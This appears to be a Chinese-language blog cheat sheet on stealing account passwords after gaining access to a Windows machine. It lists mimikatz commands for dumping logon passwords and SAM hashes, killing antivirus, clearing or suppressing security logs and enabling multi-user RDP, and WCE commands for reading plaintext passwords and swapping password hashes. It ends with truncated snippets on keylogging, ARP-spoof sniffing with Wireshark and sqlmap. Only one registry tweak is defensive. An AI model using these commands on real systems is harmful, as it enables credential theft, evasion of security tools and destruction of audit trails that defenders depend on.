獲取賬號密碼是很強大得提權方式,比如ssh,遠端登陸..等等
1.1mimikatz
當然它不僅僅能獲取密碼
privilege::debug(提權到bug)
sekurlsa::logonpasswords(獲取當前使用者賬號/密碼)
process::list (檢視當前程序)
process::start cale.exe(啟動程序)
process::stop 防毒軟體(停掉防毒軟體)
lsadump::sam(讀samwen檔案,可能失敗)
lsadump::hash(讀密碼)
ts::multirdp(設定多使用者登陸)
event::clear(刪除安全登陸日誌)
event::drop(不讓記錄日誌)
misc::cmd(啟動cmd)
misc::wifi(檢視wifi密碼)
這裡是常用功能
那麼在拿到密碼之後嘗試遠端連線的時候,會提示要斷掉被攻擊的登陸情況才可以遠端連線
那麼這個工具就又可以設定多使用者登陸ts::multirdp(設定多使用者登陸)
wce.exe -l (顯示登陸狀態的賬號密碼) -v詳細資訊
wce.exe -g password (顯示passord加密後的樣子)
wce.exe -w 讀出明文的密碼
防護:登錄檔:
machine\system\currentcontrolset\control\las\secu
rity packages (刪掉tspkg wdigest本地密碼明文)
a a.psswd
b b.passwd
wce.exe -i a b.passwd (將使用者a的密碼改為b的密碼)
1.3其他常用工具
1.4鍵盤記錄
這個不需要很高的許可權就可以監控使用者的輸入
因為很多時候都是拿到加密後的密碼
所以需要破解
可以破解各種密碼 包括作業系統的密碼比如linux賬戶的賬號密碼
Kali獲取HTTP HTTPS賬號密碼獲取實驗
此次實驗需要配合arp欺騙,對arp欺騙一臉懵的可以參考我以前寫的帖子 傳送門 這裡介紹一下http https協議 2.無連線 http 1.1之前,由於無狀態特點,每次請求需要通過tcp三次握手四次揮手,和伺服器重新建立連線。3.基於請求和響應 基本的特性,由客戶端發起請求,服務端響應 4.簡單...
wireshark 抓包獲取賬號密碼
某些 在使用者登入的過程中都是使用明文來傳輸使用者密碼的,這就使得使用者密碼完全暴露在網路中。通過抓包工具就很容易抓取密碼。抓取了很多的網路包,需要過濾掉一些與無關緊要的包。由於表單的提交多是用 post 請求,所以這裡只要顯示 http 協議中 post 請求的包就好了。我們在 filter 輸入...
WEB安全 SQLMAP獲取後台賬號密碼
sqlmap獲取後台賬號密碼 一 sqlmap sqlmap是乙個自動化注入工具,其主要功能是掃瞄 發現並利用給定的url的sql注入漏洞,內建了很多繞過外掛程式。支援的資料庫mysql oracle sql server等眾多資料庫。二 常見注入型別 布林型別盲注,即可以根據返回頁面判斷條件真假的...